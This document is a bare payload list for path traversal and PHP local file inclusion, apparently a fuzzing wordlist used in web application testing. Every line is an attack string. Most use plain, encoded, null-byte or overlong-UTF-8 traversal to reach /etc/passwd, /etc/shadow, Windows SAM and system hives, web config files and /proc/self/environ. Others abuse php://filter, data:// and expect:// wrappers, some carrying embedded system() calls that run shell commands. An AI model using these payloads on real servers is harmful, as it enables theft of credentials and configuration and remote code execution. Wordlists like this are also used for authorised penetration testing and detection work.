../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../etc/shadow
../../../etc/hosts
../../../etc/group
../../../etc/issue
../../../etc/motd
../../../etc/mysql/my.cnf
../../../var/www/html/config.php
../../windows/system32/drivers/etc/hosts
../../windows/system32/config/system
../../windows/system32/config/sam
../../boot.ini
../../inetpub/logs/logfiles/w3svc1/exYYMMDD.log
%2e%2e/%2e%2e/%2e%2e/etc/passwd
%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%2f..%2f..%2fetc%2fpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
..%c0%af..%c0%af..%c0/afetc/passwd
%252e%252e%255c%252e%252e%255cwindows%255csystem32%255cconfig%255csam
..%2f..%2f..%2fproc%2fself%2fenviron
%2e%2e/%2e%2e/%2e%2e/var/log/apache2/access.log
..%2f..%2f..%2fetc%2fpasswd%00
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%2500
../../../etc/passwd%00
../../../etc/shadow%00
../../../var/www/html/index.php%00
../../windows/system32/drivers/etc/hosts%00
../../../proc/self/environ%00
....//....//etc/passwd
..../\..../\etc/passwd
..%5c..%5c..%5cwindows%5csystem32%5cconfig%5csam
../../../../../../../../etc/passwd/./././
../../../etc/passwd/./
..%c0%af..%c0%af..%c0%afetc/passwd
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
....\/....\/....\/etc/passwd
../../../../etc/passwd%20
php://filter/convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=../../../etc/passwd
php://filter/convert.iconv.utf-8.utf-7/resource=index.php
data://text/plain,<?php phpinfo(); ?>
data://text/plain;base64,PD8gcGhwIHN5c3RlbSgnbHMnKTsgPz4=
expect://ls
expect://cat%20/etc/passwd
php://filter/read=string.rot13/resource=index.php
php://filter/read=string.strip_tags/resource=index.php
php://filter/read=convert.base64-decode/resource=index.php
../../var/log/apache2/access.log
../../var/log/apache2/error.log
../../var/log/nginx/access.log
../../var/log/nginx/error.log
../../var/log/httpd/access_log
../../var/log/httpd/error_log
../../var/log/vsftpd.log
../../var/log/auth.log
../../var/log/syslog
../../var/log/messages
/proc/self/environ
/proc/self/cmdline
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/version
/proc/cpuinfo
/proc/meminfo
/proc/mounts
/proc/net/arp
..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\windows\system32\config\sam
..\..\..\..\windows\system32\config\system
..\..\..\..\windows\repair\sam
..\..\..\..\windows\repair\system
..\..\..\..\boot.ini
..\..\..\..\windows\win.ini
..\..\..\..\windows\system.ini
..\..\..\..\programdata\Microsoft\Windows\Start Menu\Programs\Startup\startup.bat
..\..\..\..\users\public\documents\passwords.txt
....\/....\/....\/etc/passwd
..%2f..%2f..%2fetc%2fpasswd
..../....//....///etc/passwd
../../../../etc/passwd%00.jpg
php://filter/convert.base64-encode|convert.base64-decode/resource=index.php
data://text/plain,<?php echo file_get_contents('/etc/passwd'); ?>
expect://echo${IFS}Hello
php://filter/read=convert.iconv.utf-8.utf-16/resource=index.php
zip://./archive.zip#file.txt
phar://./archive.phar/file.txt
php://filter/read=convert.base64-encode/resource=../../../etc/passwd
data://text/plain,<?php system('cat /etc/passwd'); ?>
expect://cat%20/etc/passwd
php://filter/convert.base64-encode/resource=../../var/log/apache2/access.log
php://filter/read=string.rot13/resource=../../../etc/passwd
data://text/plain;base64,PD8gcGhwIHN5c3RlbSgnY2F0IC9ldGMvcGFzc3dkJyk7ID8+
php://filter/read=convert.iconv.utf-8.utf-7/resource=../../../etc/passwd
expect://ls%20-la
php://filter/read=string.strip_tags/resource=../../var/www/html/config.php
data://text/plain,<?php include('/etc/passwd'); ?>